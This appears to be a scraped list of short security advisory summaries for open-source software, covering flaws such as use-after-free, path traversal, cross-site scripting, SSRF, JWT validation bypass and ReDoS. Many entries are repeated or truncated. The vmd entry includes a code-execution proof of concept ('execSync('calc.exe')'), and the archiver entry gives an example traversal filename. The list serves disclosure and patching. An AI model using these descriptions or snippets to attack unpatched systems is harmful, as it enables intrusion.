A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.

Use After Free

The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification.

Use After Free

There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

Use After Free

There's a flaw in libxml2. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

Use After Free

There's a flaw in libxml2 An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

Use After Free

There's a flaw in libxml2 An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

Session Fixation

An insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.

Path Traversal in Buildah

A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.

Origin Validation Error

Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards.

Loop with Unreachable Exit Condition ('Infinite Loop')

The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.

Insertion of Sensitive Information into Log File

The Elastic APM agent for Go versions before 1.11.0 can leak sensitive HTTP header information when logging the details during an application panic. Normally, the APM agent will sanitize sensitive HTTP header details before sending the information to the APM server. During an application panic it is possible the headers will not be sanitized before being sent.

Incorrect Authorization

A flaw was found in podman before 1.7.0. File permissions for non-root users running in a privileged container are not correctly checked. This flaw can be abused by a low-privileged user inside the container to access any other file in the container, even if owned by the root user inside the container. It does not allow to directly escape the container, though being a privileged container means that a lot …

Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 …

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Rancher 2 through 2.2.4 is vulnerable to a Cross-Site Websocket Hijacking attack that allows an exploiter to gain access to clusters managed by Rancher. The attack requires a victim to be logged into a Rancher server, and then to access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the cluster's Kubernetes API with the permissions and identity of the …

Improper Link Resolution Before File Access ('Link Following')

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

All versions of archiver allow attacker to perform a Zip Slip attack via the "unarchive" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location …

Improper Handling of Exceptional Conditions

jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m["aud"] (which is allowed by the specification). Because the type assertion fails, "" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.

Improper Authorization

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 11.10.13, 12.6.7, and 12.10.2, a user disabled on a wiki using email verification for registration canouldre-activate themself by using the activation link provided for his registration. The problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0. It is possible to workaround the issue by …

Improper Access Control

go-jose before 1.0.4 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated.

User enumeration in authentication mechanisms

Description The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. Resolution We now ensure that 403s are returned whether the user exists or not if the password is invalid or …

User enumeration in authentication mechanisms

Description The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. It was also possible to enumerate users by using a timing attack, by comparing time elapsed when authenticating an existing user and authenticating a non-existing user. Resolution We now ensure that 403s are returned whether the user exists or not if the password is invalid or …

Unrestricted Upload of File with Dangerous Type

Matrix-React-SDK is a react-based SDK for inserting a Matrix chat/voip client into a web page., when uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file. This can only occur after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other …

Reliance on Cookies without Validation and Integrity Checking

fastify-csrf is an open-source plugin helps developers protect their Fastify server against CSRF attacks. Versions of fastify-csrf have a "double submit" mechanism using cookies with an application deployed across multiple subdomains, e.g. "heroku"-style platform as a service. of the fastify-csrf fixes it. the vulnerability. The user of the module would need to supply a userInfo when generating the CSRF token to fully implement the protection on their end. This is …

Open Redirect in Flask-Security-Too

Flask-Security allows redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented …

Incorrect Default Permissions

Access bypass vulnerability in of Drupal Core Workspaces allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content.

Incorrect Default Permissions

Access bypass vulnerability in of Drupal Core Workspaces allows an attacker to access data without correct permissions. The Workspaces module does not sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content. This vulnerability is mitigated by the fact that sites are only vulnerable if they have installed the …

Cross-site Scripting

When taxes are enabled, the Additional tax classes field was not properly sanitised or escaped before being output back in the admin dashboard, allowing high privilege users such as admin to use XSS payloads even when the unfiltered_html setting is disabled

Cross-site Scripting

vmd allows div class="markdown-body" XSS, as demonstrated by Electron remote code execution via require('child_process').execSync('calc.exe') on Windows and a similar attack on macOS.

NULL Pointer Dereference

A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.

NULL Pointer Dereference

A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.

NULL Pointer Dereference

A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.

NULL Pointer Dereference

A vulnerability found in libxml2 shows that it does not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.

Information Exposure

Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the …

Information Exposure

express-hbs is an Express handlebars template engine. express-hbs mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .hbs appended to them.

Cross-site Scripting

haml-coffee is a JavaScript templating solution. haml-coffee mixes pure template data with engine configuration options through the Express render API. More specifically, haml-coffee supports overriding a series of HTML helper functions through its configuration options. A vulnerable application that passes user controlled request objects to the haml-coffee template engine may introduce RCE vulnerabilities. Additionally control over the escapeHtml parameter through template configuration pollution ensures that haml-coffee would not sanitize template …

Code Injection

Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE.

Use of "infinity" as an input to datetime and date fields causes infinite loop in pydantic

Impact Passing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU). Patches Pydantic is be patched with fixes available in the following versions: v1.8.2 v1.7.4 v1.6.2 All these versions are available on pypi, and will be available on conda-forge soon. See the changelog for details. Workarounds If you absolutely can't upgrade, you can work …

Use After Free

A possible use-after-free and double-free in c-ares lib if ares_destroy() is called prior to ares_getaddrinfo() completing. This flaw possibly allows an attacker to crash the service that uses c-ares lib. The highest threat from this vulnerability is to this service availability.

Server-Side Request Forgery (SSRF)

The OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Server Side Request Forgery (SSRF) vulnerability. The vulnerability arises due to unsafe usage of the logo_uri parameter in the Dynamic Client Registration request. An unauthenticated attacker can make a HTTP request from the vulnerable server to any address in the internal network and obtain its response (which might, for example, have a JavaScript payload for resultant XSS). The …

Server-Side Request Forgery (SSRF)

CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a "request" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the "request_uri" parameter. CXF was not validating the "request_uri" parameter (apart from ensuring it uses "https) …

Out-of-bounds Write

A flaw was found in OpenJPEG’s encoder. This flaw allows an attacker to pass specially crafted x,y offset input to OpenJPEG to use during encoding. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Out-of-bounds Read

A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability.

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that status codes are returned whether the user exists or not if a user cannot switch to a user or …

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …

Information Exposure

A flaw was found in wildfly. The JBoss EJB client has publicly accessible privileged actions which may lead to information disclosure on the server it is deployed on. The highest threat from this vulnerability is to data confidentiality.

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …

Information Exposure

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that error codes are returned whether the user exists or not if a user cannot switch to a user or …

Improper Privilege Management

The Flask-Caching extension for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful.

Exposure of Sensitive Information to an Unauthorized Actor

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that s are returned whether the user exists or not if a user cannot switch to a user or if …

Exposure of Sensitive Information to an Unauthorized Actor

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The ability to enumerate users was possible without relevant permissions due to different handling depending on whether the user existed or not when attempting to use the switch users functionality. We now ensure that s are returned whether the user exists or not if a user cannot switch to a user or if …

Insecure Temporary File

A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.

Insecure Temporary File

A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.

Insecure Temporary File

A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.

Insecure Temporary File

A flaw was found in keycloak. Directories can be created prior to the Java process creating them in the temporary directory, but with wider user permissions, allowing the attacker to have access to the contents that keycloak stores in this directory. The highest threat from this vulnerability is to data confidentiality and integrity.

Uncontrolled Resource Consumption

Puma is a concurrent HTTP server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A puma server which received more concurrent keep-alive connections …

Uncontrolled Resource Consumption

Puma is a concurrent HTTP server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. A puma server which received more concurrent keep-alive connections …

Missing Authorization

Jenkins S3 publisher Plugin does not perform Run/Artifacts permission checks in various HTTP endpoints and API models, allowing attackers with Item/Read permission to obtain information about artifacts uploaded to S3, if the optional Run/Artifacts permission is enabled.

Missing Authorization

Jenkins P4 Plugin does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password.

Improper Privilege Management

Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system. The issue has been patched with Files.createTempFile and released in the v5.1.0 …

Deserialization of Untrusted Data

Due to how Wire handles type information in its serialization format, malicious payloads can be passed to a deserializer. e.g. using a surrogate on the sender end, an attacker can pass information about a different type for the receiving end. And by doing so allowing the serializer to create any type on the deserializing end. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300?view=vs-2019.

Cross-site Scripting

(This issue is currently in DISPUTED state). The express-cart package for Node.js allows Reflected XSS (for an admin) via a user input field for product options. The vendor states that this "would rely on an admin hacking his/her own website."

Uncontrolled Resource Consumption

JPA Server in HAPI FHIR allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.

Server-Side Request Forgery (SSRF)

The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This …

Privilege escalation in spring security

Spring Security 5.4.x to 5.4.3, 5.3.x to 5.3.8.RELEASE, 5.2.x to 5.2.8.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug …

Privilege escalation in spring security

Spring Security 5.4.x to 5.4.3, 5.3.x to 5.3.8.RELEASE, 5.2.x to 5.2.8.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug …

Incorrect Authorization

Applications using the “Sensitive Headers” functionality in Spring Cloud Netflix Zuul 2.2.6.RELEASE and below may be vulnerable to bypassing the “Sensitive Headers” restriction when executing requests with specially constructed URLs. Applications that use Spring Security's StrictHttpFirewall (enabled by default for all URLs) are not affected by the vulnerability, as they reject requests that allow bypassing.

Incorrect Authorization

Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3: Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only …

Incorrect Authorization

When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.

Improper Privilege Management

Openapi generator is a java tool which allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. openapi-generator-online creates insecure temporary folders with File.createTempFile during the code generation process. The insecure temporary folders store the auto-generated files which can be read and appended to by any users on the system.

Improper Locking

A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …

Improper Locking

A deadlock vulnerability was found in 'github.com/containers/storage' in versions before 1.28.1. When a container image is processed, each layer is unpacked using tar. If one of those layers is not a valid tar archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded …

Cross-site Scripting

Cross-site scripting vulnerability in EC-CUBE to allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser.

Use of Insufficiently Random Values

SIF is an open source implementation of the Singularity Container Image Format. The siftool new command and func siftool.New() produce predictable UUID identifiers due to insecure randomness in the version of the github.com/satori/go.uuid module used as a dependency. A patch is available in version >= v1.2.3 of the module. Users are encouraged to upgrade.

Loop with Unreachable Exit Condition ('Infinite Loop')

A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 …

Unauthorized access through URL manipulation

Impact The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. Patches The vulnerability has been patched of the master branch of the series, of the stable branch. The Docker image on docker.io has been patched. Workarounds If upgrading is not possible, manually apply the changes of https://github.com/jhpyle/docassemble/commit/e3dbf6ce054b3c0310996f0657289f5eed0a73fe and restart the server (e.g., by pressing Save on the Configuration screen). Credit The vulnerability was …

Insecure temporary directory usage in frontend build functionality of Vaadin 14 and 15-19

Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds. https://vaadin.com/security/cve-2021-31411

Injection Vulnerability

The "gitDiff" function in Wayfair git-parse has a command injection vulnerability. Clients of the git-parse library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Improper Control of Dynamically-Managed Code Resources

Mixme is a library for recursive merging of Javascript objects. In Node.js mixme, an attacker can add or alter properties of an object via proto through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).

Cross-Site Request Forgery (CSRF)

Multiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.

Insecure Temporary File

Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server allows local users to inject malicious code into frontend resources during application rebuilds.

Incorrect Authorization

Access bypass vulnerability in Drupal Core allows JSON:API when JSON:API is in read/write mode. Only sites that have the read_only set to FALSE under jsonapi.settings config are vulnerable.

Cross-site Scripting

Highcharts JS is a JavaScript charting library based on SVG. In Highcharts, the chart options structure was not systematically filtered for XSS vectors. The potential impact was that content from untrusted sources could execute code in the end user's browser. The vulnerability is patched As a workaround, implementers who are not able to upgrade may apply DOMPurify recursively to the options structure to filter out malicious markup.

Command Injection

Arbitrary PHP code execution vulnerability in Drupal Core under certain circumstances. An attacker could trick an administrator into visiting a malicious site that could result in creating a carefully named directory on the file system. With this directory in place, an attacker could attempt to brute force a remote code execution vulnerability.

Command Injection

Arbitrary PHP code execution vulnerability in Drupal Core under certain circumstances. An attacker could trick an administrator into visiting a malicious site that could result in creating a carefully named directory on the file system. With this directory in place, an attacker could attempt to brute force a remote code execution vulnerability. Windows servers are most likely to be affected.

Missing Authorization

October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-26231 (fixed in 1.0.470/471 and 1.1.1) was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247. An authenticated backend user with the cms.manage_pages, cms.manage_layouts, or cms.manage_partials permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to cms.enableSafeMode being enabled is able to write …

Prototype Pollution

An attacker can add or alter properties of an object via proto through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).

Missing Authorization

October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-26231 was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247. An authenticated backend user with the cms.manage_pages, cms.manage_layouts, or cms.manage_partials permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to cms.enableSafeMode being enabled is able to write specific Twig code to escape …

Apr 2021

Uncontrolled Resource Consumption in urllib3

The _encode_invalid_chars function in util/url.py in the urllib3 library 1.25.2 through 1.25.7 for Python allows a denial of service (CPU consumption) because of an inefficient algorithm. The percent_encodings array contains all matches of percent encodings. It is not deduplicated. For a URL of length N, the size of percent_encodings may be up to O(N). The next step (normalize existing percent-encoded bytes) also takes up to O(N) for each step, so …

Timing attacks in python-rsa

It was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA

libtaxii Server-Side Request Forgery vulnerability

"TAXII libtaxii through 1.1.117, as used in EclecticIQ OpenTAXII through 0.2.0 and other products, allows SSRF via an initial http:// substring to the parse method, even when the no_network setting is used for the XML parser. NOTE: the vendor points out that the parse method "wraps the lxml library" and that this may be an issue to "raise … to the lxml group.""

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Kirby is an open source CMS. An editor with write access to the Kirby Panel can upload an SVG file that contains harmful content like <script> tags. The direct link to that file can be sent to other users or visitors of the site. If the victim opens that link in a browser where they are logged in to Kirby, the script will run and can for example trigger requests …

Improper Input Validation

cumulative-distribution-function is an open source npm library used which calculates statistical cumulative distribution function from data array of x values. Applications using this library on improper data may crash or go into an infinite-loop. In the case of a nodejs server-app using this library to act on invalid non-numeric data, the nodejs server may crash. This may affect other users of this server and/or require the server to be rebooted …

Improper Input Validation

The Alertmanager in CNCF Cortex has a local file disclosure vulnerability when -experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list.

Forced Browsing in Twisted

Twisted before 16.3.1 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect a CGI application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an httpoxy issue.

Externally Controlled Reference to a Resource in Another Sphere

Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.

Authentication bypass in Apache Airflow

The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `api in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

Uncontrolled Resource Consumption

CKEditor 5 provides a WYSIWYG editing solution. A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze.

SQL Server LIMIT / OFFSET SQL Injection in laravel/framework and illuminate/database

Impact Those using SQL Server with Laravel and allowing user input to be passed directly to the limit and offset functions is vulnerable to SQL injection. Other database drivers such as MySQL and Postgres are not affected by this vulnerability. Patches This problem has been patched on Laravel versions 6.20.26, 7.30.5, and 8.40.0. Workarounds You may workaround this vulnerability by ensuring that only integers are passed to the limit and …

SQL Server LIMIT / OFFSET SQL Injection in laravel/framework and illuminate/database

Impact Those using SQL Server with Laravel and allowing user input to be passed directly to the limit and offset functions is vulnerable to SQL injection. Other database drivers such as MySQL and Postgres are not affected by this vulnerability. Patches This problem has been patched on Laravel versions 6.20.26, 7.30.5, and 8.40.0. Workarounds You may workaround this vulnerability by ensuring that only integers are passed to the limit and …

OS Command Injection

systeminformation is an open source system and OS information library for node.Please upgrade to If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() and other commands. Only allow strings, reject any arrays. String sanitation works as expected.

Information Exposure

A flaw was found in the Ansible Engine, where sensitive info is not masked by default and is not protected by the no_log feature when using the sub-option feature of the basic.py module. This flaw allows an attacker to obtain sensitive information. The highest threat from this vulnerability is to confidentiality.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

